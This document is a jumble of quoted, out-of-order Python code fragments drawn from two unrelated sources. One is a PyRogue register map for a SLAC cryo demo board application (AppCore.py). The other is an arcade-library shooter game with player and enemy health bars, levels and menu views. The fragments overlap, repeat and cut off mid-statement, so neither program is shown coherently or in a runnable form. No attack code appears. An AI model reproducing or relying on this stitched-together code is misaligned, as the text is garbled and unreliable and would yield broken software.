"python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application #-----------------------------------------------------------------------------",
"\"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\",",
"= 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\",",
"\"Count number of stream triggers\", offset = 0x0000000C, bitSize = 32, bitOffset =",
"def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0],",
"Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- #",
"file, may be # copied, modified, propagated, or distributed except according to the",
"super().__init__(name=name, description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name =",
"description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description,",
"bitSize = 32, bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval",
"common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description =",
"pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description",
"Description: # PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file",
"subject to # the license terms in the LICENSE.txt file found in the",
"= \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize = 32,",
"0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000),",
"__init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs)",
"counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt,",
"description=description, **kwargs) ######### # Devices ######### # for i in range(2): # if",
"= \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\", offset",
"############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ",
"base = pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name =",
"bitSize = 1, bitOffset = 9, base = pr.UInt, mode = \"RW\", ))",
"# )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ###########",
"= \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset",
"# if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name",
"expand=False, )) ############################## # Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to",
"file is part of the rogue software platform. It is subject to #",
"@self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",) def CmdDacSigTrigArm(): self.DacSigTrigArm.set(1)",
"bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name =",
"as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name =",
"= 0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable(",
"\"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable(",
"offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig",
"\"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004,",
"# Commands ############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",)",
"# the license terms in the LICENSE.txt file found in the top-level directory",
"pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description",
"offset = (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True))",
"mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"StreamCounterRst\", description = \"Reset stream counters\",",
"self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream triggers\", offset =",
"= \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name =",
"https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this file, may",
"the rogue software platform, including this file, may be # copied, modified, propagated,",
"data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base",
"= 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode =",
"terms in the LICENSE.txt file found in the top-level directory # of this",
"except according to the terms # contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import",
"Demo Board Application #----------------------------------------------------------------------------- # This file is part of the rogue software",
"**kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description =",
"**kwargs) ######### # Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset =",
"\"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\",",
"Board Application #----------------------------------------------------------------------------- # This file is part of the rogue software platform.",
"modified, propagated, or distributed except according to the terms # contained in the",
"= (i*0x00100000), # expand = True, # )) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet(",
"bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden = True, ))",
"No part of the rogue software platform, including this file, may be #",
"= 1, bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable(",
")) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset = 0x00000008,",
"8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description",
"1, bitOffset = 0, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name",
"offset = 0x0000000C, bitSize = 32, bitOffset = 0, base = pr.UInt, mode",
"= pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset",
")) self.add(pr.RemoteVariable( name = \"StreamCounter\", description = \"Count number of stream triggers\", offset",
"pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description",
"# Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File",
"bitSize = 16, bitOffset = 0, base = pr.Int, mode = \"RW\", ))",
"base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description =",
"be # copied, modified, propagated, or distributed except according to the terms #",
"description=description, **kwargs) ######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]',",
"############################## @self.command(description=\"Arms for a DAC SIG Trigger to the DAQ MUX\",) def CmdDacSigTrigArm():",
"0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode = \"RW\",",
"name = f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2,",
"description = \"Count number of stream triggers\", offset = 0x0000000C, bitSize = 32,",
"1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset =",
"pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream",
"\"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices for",
"Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description:",
"\"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8, base",
"import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self,",
"name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24,",
"class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs):",
"in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import *",
"mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def __init__( self, name",
"platform, including this file, may be # copied, modified, propagated, or distributed except",
"= \"Reset stream counters\", offset = 0x00000008, bitSize = 1, bitOffset = 8,",
"__init__( self, name = \"StreamReg\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs)",
"offset = 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base =",
"file found in the top-level directory # of this distribution and at: #",
"0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device):",
"base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name =",
"LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device):",
"pyrogue as pr from common.SimRtmCryoDet import * class StreamData(pr.Device): def __init__( self, name",
"EOFE\", offset = 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt,"
] |
[
"bar # Draw the red background start_x = 120 start_y = 35 if",
"self.bullet_list.update() if len(self.enemy_list) == 0 and self.window.level > self.updated_level: self.window.level += 1 self.good",
"to start\", start_x, start_y, arcade.color.WHITE, 20) arcade.draw_rectangle_outline(center_x=395, center_y=123, width=200, height=50, color=WHITE) def on_mouse_press(self,",
"Set up the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList()",
"def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y =",
"ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\"",
"= 270 arcade.draw_text(f\"You died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE",
"if self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good = False",
"to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x",
"menu view \"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View):",
"= arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\", SPRITE_SCALING_PLAYER, player_max_health=10) self.player_sprite.center_x = 400 self.player_sprite.center_y = 300",
"bullet bullet = arcade.Sprite(\":resources:images/space_shooter/meteorGrey_small1.png\", SPRITE_SCALING_BULLET) # Position the bullet at the player's current",
"not isinstance(player, PLAYER): raise TypeError(\"List contents must be all ints\") # Remove one",
"Game\" SPRITE_SPEED = 0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5",
"f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number() player.player_draw_health_bar()",
"class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add extra attributes",
"min(SPRITE_SPEED, player_sprite.center_x - self.center_x) elif self.center_x > player_sprite.center_x: self.center_x -= min(SPRITE_SPEED, self.center_x -",
"# For every enemy we hit, process for enemy in hit_list: # Make",
"the red background start_x = 120 start_y = 35 if self.player_cur_health < self.player_max_health:",
"self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x",
"on your keyboard to move around\", start_x, start_y, arcade.color.RED, 15) start_x = 310",
"aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210 arcade.draw_text(\"Click to",
"this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x =",
"modifiers): \"\"\"Called whenever a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed",
"arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list: # Check this",
"if self.enemy_list == 0: self.window.level = self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good =",
"self.bullet_list: # Check this bullet to see if it hit a enemy hit_list",
"update(self): # Rotate the coin. # The arcade.Sprite class has an \"angle\" attribute",
"Taking into account the angle, calculate our change_x # and change_y. Velocity is",
"start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE,",
"MyGame() game_view.setup() self.window.show_view(game_view) arcade.run() class GameOverView(arcade.View): \"\"\" Class to manage the game over",
"= random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3)",
"== arcade.key.DOWN: self.down_pressed = True elif key == arcade.key.LEFT: self.left_pressed = True elif",
"Draw the red background start_x = 120 start_y = 35 if self.player_cur_health <",
"enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y",
"enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\",",
"= False elif self.window.level > 3 and self.window.level < 6: for i in",
"view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game",
"= 270 arcade.draw_text(\"Use the arrow keys on your keyboard to move around\", start_x,",
"elif key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed =",
"modifiers): # Called whenever the mouse button is clicked arcade.play_sound(self.gun_sound) # Create a",
"* (self.player_cur_health / self.player_max_health) arcade.draw_rectangle_filled(start_x - 0.5 * (HEALTHBAR_WIDTH - health_width), start_y ,",
"height=50, color=WHITE) def on_mouse_press(self, _x, _y, _button, _modifiers): \"\"\" Use a mouse press",
"enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not dead arcade.play_sound(self.hit_sound)",
"= 5 class PLAYER(arcade.Sprite): def __init__(self, image, scale, player_max_health): super().__init__(image, scale) # Add",
"Not dead arcade.play_sound(self.playerDeath_sound) # Loop through each bullet for bullet in self.bullet_list: #",
"if self.enemy_cur_health < self.enemy_max_health: arcade.draw_rectangle_filled(center_x=self.center_x, center_y=self.center_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH, height=3, color=arcade.color.RED) # Calculate",
"key == arcade.key.DOWN: self.down_pressed = False elif key == arcade.key.LEFT: self.left_pressed = False",
"10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View): \"\"\" Class that manages the 'menu' view.",
"the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy we hit,",
"True elif key == arcade.key.LEFT: self.left_pressed = True elif key == arcade.key.RIGHT: self.right_pressed",
"self.window.level >= 0 and self.window.level <= 3: for i in range(self.amount_of_enemies): # Create",
"40 arcade.draw_text(health_string, start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTH_NUMBER_OFFSET_Y, arcade.color.WHITE, 12) # arcade.draw_text(health_string, #",
"1: self.right = SCREEN_WIDTH - 1 # Make sure he cant go off",
"game_over = GameOverView() self.window.show_view(game_over) arcade.run() # enemy dead player.remove_from_sprite_lists() else: # Not dead",
"class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. # The arcade.Sprite class has",
"= 5 self.enemy_health3 = 10 self.good = True self.window.level = 1 self.updated_level =",
"import math import os from arcade.color import BLACK, WHITE SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY",
"sprites self.enemy_list.draw() self.bullet_list.draw() self.player_list.draw() output = f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15)",
"arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main application class. \"\"\" def",
"Remove one health point enemy.enemy_cur_health -= 1 # Check health if enemy.enemy_cur_health <=",
"False elif self.window.level > 3 and self.window.level < 6: for i in range(self.amount_of_enemies):",
"random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy)",
"self.enemy_list == 0: self.level = self.updated_level + 1 else: self.good = False else:",
"start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x,",
"None # Set up the player self.player_sprite = None self.enemy_health = 2 self.enemy_health2",
"self.player_sprite.center_x = 400 self.player_sprite.center_y = 300 self.player_list.append(self.player_sprite) self.levels() # Set the background color",
"HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10 HEALTH_NUMBER_OFFSET_X = -10 HEALTH_NUMBER_OFFSET_Y",
"for the bullet dest_x = x dest_y = y # Do math to",
"random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT) #",
"Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290 start_y = 270 arcade.draw_text(f\"You",
"math.sin(angle) * BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self,",
"Shoot\", start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to",
"bullet.change_y = math.sin(angle) * BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet)",
"SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x = random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT)",
"# Do math to calculate how to get the bullet to the destination.",
"= 800 SCREEN_HEIGHT = 600 SCREEN_TITLE = \"Shooter Game\" SPRITE_SPEED = 0.20 BULLET_SPEED",
"arcade.color.RED, 15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\",",
"view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x = 290",
"switching to this view\"\"\" arcade.set_background_color(arcade.color.BLACK) def on_draw(self): \"\"\" Draw the game over view",
"None def levels(self): while self.good: if self.window.level >= 0 and self.window.level <= 3:",
"- 1: self.right = SCREEN_WIDTH - 1 # Make sure he cant go",
"* BULLET_SPEED # Add the bullet to the lists self.bullet_list.append(bullet) def on_update(self, delta_time):",
"self.good = False def setup(self): # Set up the game # Sprite lists",
"game over view \"\"\" arcade.start_render() arcade.draw_text(\"Game Over!\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/2.5, arcade.color.RED, 100, anchor_x=\"center\") start_x",
"enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120,",
"start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x",
"False self.width = SCREEN_WIDTH # Background image will be stored in this variable",
"random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) if self.enemy_list",
"the player's current location start_x = self.player_sprite.center_x start_y = self.player_sprite.center_y bullet.center_x = start_x",
"def setup(self): # Set up the game # Sprite lists self.window.level = 1",
"= None self.enemy_health = 2 self.enemy_health2 = 5 self.enemy_health3 = 10 self.good =",
"= random.randrange(SCREEN_WIDTH) enemy.center_y = random.randrange(120, SCREEN_HEIGHT) enemy2.center_x = random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT)",
"self.enemy_max_health) arcade.draw_rectangle_filled(center_x=self.center_x - 0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT,",
"self.updated_level + 1 arcade.play_sound(self.newLevel_sound) else: self.good = False elif self.window.level > 3 and",
"Draw the health bar # Draw the red background start_x = 120 start_y",
"on_key_press(self, key, _modifiers): \"\"\" If user hits escape, go back to the main",
"on_draw(self): # render the screen befroe start drawing arcade.start_render() arcade.draw_lrwh_rectangle_textured(0, 0, SCREEN_WIDTH, SCREEN_HEIGHT,",
"0.5 * (HEALTHBAR_WIDTH - health_width), center_y=self.center_y - 10, width=health_width, height=HEALTHBAR_HEIGHT, color=arcade.color.GREEN) class MenuView(arcade.View):",
"background color self.background = arcade.load_texture(\":resources:images/backgrounds/abstract_1.jpg\") def on_key_press(self, key, modifiers): \"\"\"Called whenever a key",
"== 0 and self.window.level > self.updated_level: self.window.level += 1 self.good = True self.levels()",
"# Check health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else:",
"lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1",
"\"\"\" if key == arcade.key.ESCAPE: menu_view = MenuView() self.window.show_view(menu_view) class MyGame(arcade.View): \"\"\" Main",
"= 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH = 800 SCREEN_HEIGHT = 600 SCREEN_TITLE =",
"random.randrange(120, SCREEN_HEIGHT) # Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if",
"= False elif key == arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render",
"self.up_pressed = True elif key == arcade.key.DOWN: self.down_pressed = True elif key ==",
"lists self.player_list = None self.enemy_list = None self.bullet_list = None # Set up",
"def follow_sprite(self, player_sprite): # This tells the enemies to go to the main",
"0.20 BULLET_SPEED = 5 HEALTHBAR_WIDTH = 25 HEALTHBAR_HEIGHT = 5 HEALTHBAR_OFFSET_Y = -10",
"\"\"\" self.player_sprite.change_x = 0 self.player_sprite.change_y = 0 if self.up_pressed and not self.down_pressed: self.player_sprite.change_y",
"SPRITE_SCALING_PLAYER = .60 SPRITE_SCALING_ENEMY = 0.5 SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET",
"+ 10, color=arcade.color.RED) # Calculate width based on health start_x = 85 start_y",
"> SCREEN_HEIGHT - 1: self.top = SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self):",
"1 self.updated_level = -1 self.amount_of_enemies = 5 self.speed = SPRITE_SPEED # Game Sounds",
"self.newLevel_sound = arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound",
"enemy image enemy = ENEMY(\":resources:images/animated_characters/robot/robot_walk7.png\", SPRITE_SCALING_ENEMY, self.enemy_health) enemy2 = ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) #",
"35 if self.player_cur_health < self.player_max_health: arcade.draw_rectangle_filled(start_x + HEALTH_NUMBER_OFFSET_X, start_y + HEALTHBAR_OFFSET_Y, width=HEALTHBAR_WIDTH +",
"self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y = -MOVEMENT_SPEED if",
"start_x = 220 start_y = 370 arcade.draw_text(\"Shooter Game\", start_x, start_y, arcade.color.WHITE, 50) self.player_sprite",
"super().__init__(image, scale) # Add extra attributes for health self.enemy_max_health = enemy_max_health self.enemy_cur_health =",
"or bullet.right < 0 or bullet.left > self.width: bullet.remove_from_sprite_lists() def main(): window =",
"\"Shooter Game\") menu_view = MenuView() window.show_view(menu_view) arcade.run() window.level = 0 # game =",
"= random.randrange(SCREEN_WIDTH) enemy2.center_y = random.randrange(120, SCREEN_HEIGHT) enemy3.center_x = random.randrange(SCREEN_WIDTH) enemy3.center_y = random.randrange(120, SCREEN_HEIGHT)",
"around the screen self.center_x += self.change_x self.center_y += self.change_y # Check for out-of-bounds",
"= 240 arcade.draw_text(\"Use your mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x =",
"self.left < 0: self.left = 0 elif self.right > SCREEN_WIDTH - 1: self.right",
"self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level + 1 else: self.good",
"player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -= min(SPRITE_SPEED, self.center_y - player_sprite.center_y)",
"start_x, start_y, arcade.color.RED, 15) start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\",",
"to return to Main Menu.\\n\", SCREEN_WIDTH/2, SCREEN_HEIGHT/4, arcade.color.WHITE, 25, anchor_x=\"center\") def on_key_press(self, key,",
"= False elif key == arcade.key.LEFT: self.left_pressed = False elif key == arcade.key.RIGHT:",
"min(SPRITE_SPEED, self.center_y - player_sprite.center_y) if self.center_x < player_sprite.center_x: self.center_x += min(SPRITE_SPEED, player_sprite.center_x -",
"to calculate how to get the bullet to the destination. x_diff = dest_x",
"-MOVEMENT_SPEED elif self.right_pressed and not self.left_pressed: self.player_sprite.change_x = MOVEMENT_SPEED self.player_list.update() for enemy in",
"health if enemy.enemy_cur_health <= 0: # enemy dead enemy.remove_from_sprite_lists() arcade.play_sound(self.death_sound) else: # Not",
"change_y. Velocity is how fast the bullet travels. bullet.change_x = math.cos(angle) * BULLET_SPEED",
"SPRITE_SCALING_ENEMY_2 = 0.15 SPRITE_SCALING_ENEMY_3 = 0.3 SPRITE_SCALING_BULLET = 0.7 ENEMY_COUNT = 15 SCREEN_WIDTH",
"# Add the enemy to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list ==",
"ENEMY(\":resources:images/animated_characters/robot/robot_fall.png\", SPRITE_SCALING_ENEMY_2, self.enemy_health2) enemy3 = ENEMY(\":resources:images/enemies/saw.png\", SPRITE_SCALING_ENEMY_3, self.enemy_health3) # Position the enemy enemy.center_x",
"died in level: {self.window.level}\", start_x, start_y, arcade.color.RED, 20) arcade.draw_text(\"Click ESCAPE to return to",
"+ HEALTH_NUMBER_OFFSET_X, start_y=self.center_y + HEALTH_NUMBER_OFFSET_Y, font_size=12, color=arcade.color.WHITE) def enemy_draw_health_bar(self): # Draw the health",
"< 6: for i in range(self.amount_of_enemies): # Create the enemy image enemy =",
"the game # Sprite lists self.window.level = 1 self.player_list = arcade.SpriteList() self.enemy_list =",
"to the lists self.enemy_list.append(enemy) self.enemy_list.append(enemy2) self.enemy_list.append(enemy3) if self.enemy_list == 0: self.window.level = self.updated_level",
"player_sprite.center_y: self.center_y += min(SPRITE_SPEED, player_sprite.center_y - self.center_y) elif self.center_y > player_sprite.center_y: self.center_y -=",
"15) start_x = 310 start_y = 240 arcade.draw_text(\"Use your mouse to aim\", start_x,",
"= f\"Level: {self.window.level}\" arcade.draw_text(output, 12, 45, arcade.color.WHITE, 15) for player in self.player_list: player.player_draw_health_number()",
"rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists() # For every enemy",
"1 self.player_list = arcade.SpriteList() self.enemy_list = arcade.SpriteList() self.bullet_list = arcade.SpriteList() self.player_sprite = PLAYER(\":resources:images/animated_characters/male_adventurer/maleAdventurer_walk1.png\",",
"rotates. self.angle += self.change_angle def follow_sprite(self, player_sprite): # This tells the enemies to",
"start_x = 330 start_y = 110 arcade.draw_text(\"Click to start\", start_x, start_y, arcade.color.WHITE, 20)",
"270 arcade.draw_text(\"Use the arrow keys on your keyboard to move around\", start_x, start_y,",
"mouse to aim\", start_x, start_y, arcade.color.RED, 15) start_x = 360 start_y = 210",
"def update(self): \"\"\" Move the player \"\"\" # Move player around the screen",
"whenever a key is pressed. \"\"\" if key == arcade.key.UP: self.up_pressed = True",
"If it did, get rid of the bullet if len(hit_list) > 0: bullet.remove_from_sprite_lists()",
"True self.levels() self.amount_of_enemies += 2 #self.enemy_health += 1 self.speed += .20 arcade.play_sound(self.newLevel_sound) for",
"on_draw(self): \"\"\" Draw the menu \"\"\" arcade.start_render() start_x = 220 start_y = 370",
"= None self.enemy_list = None self.bullet_list = None # Set up the player",
"bullet for bullet in self.bullet_list: # Check this bullet to see if it",
"= arcade.load_sound(\"shooting_game/assets/sounds/newLevel.wav\") self.gun_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.hit_sound = arcade.load_sound(\"shooting_game/assets/sounds/shoot.wav\") self.death_sound = arcade.load_sound(\"shooting_game/assets/sounds/deathenemy.wav\") self.playerDeath_sound =",
"player \"\"\" # Move player around the screen self.center_x += self.change_x self.center_y +=",
"self.up_pressed and not self.down_pressed: self.player_sprite.change_y = MOVEMENT_SPEED elif self.down_pressed and not self.up_pressed: self.player_sprite.change_y",
"arcade.key.RIGHT: self.right_pressed = False def on_draw(self): # render the screen befroe start drawing",
"= SCREEN_HEIGHT - 1 class ENEMY(arcade.Sprite): def update(self): # Rotate the coin. #",
"arcade.load_sound(\"shooting_game/assets/sounds/gameOver.wav\") self.left_pressed = False self.right_pressed = False self.up_pressed = False self.down_pressed = False",
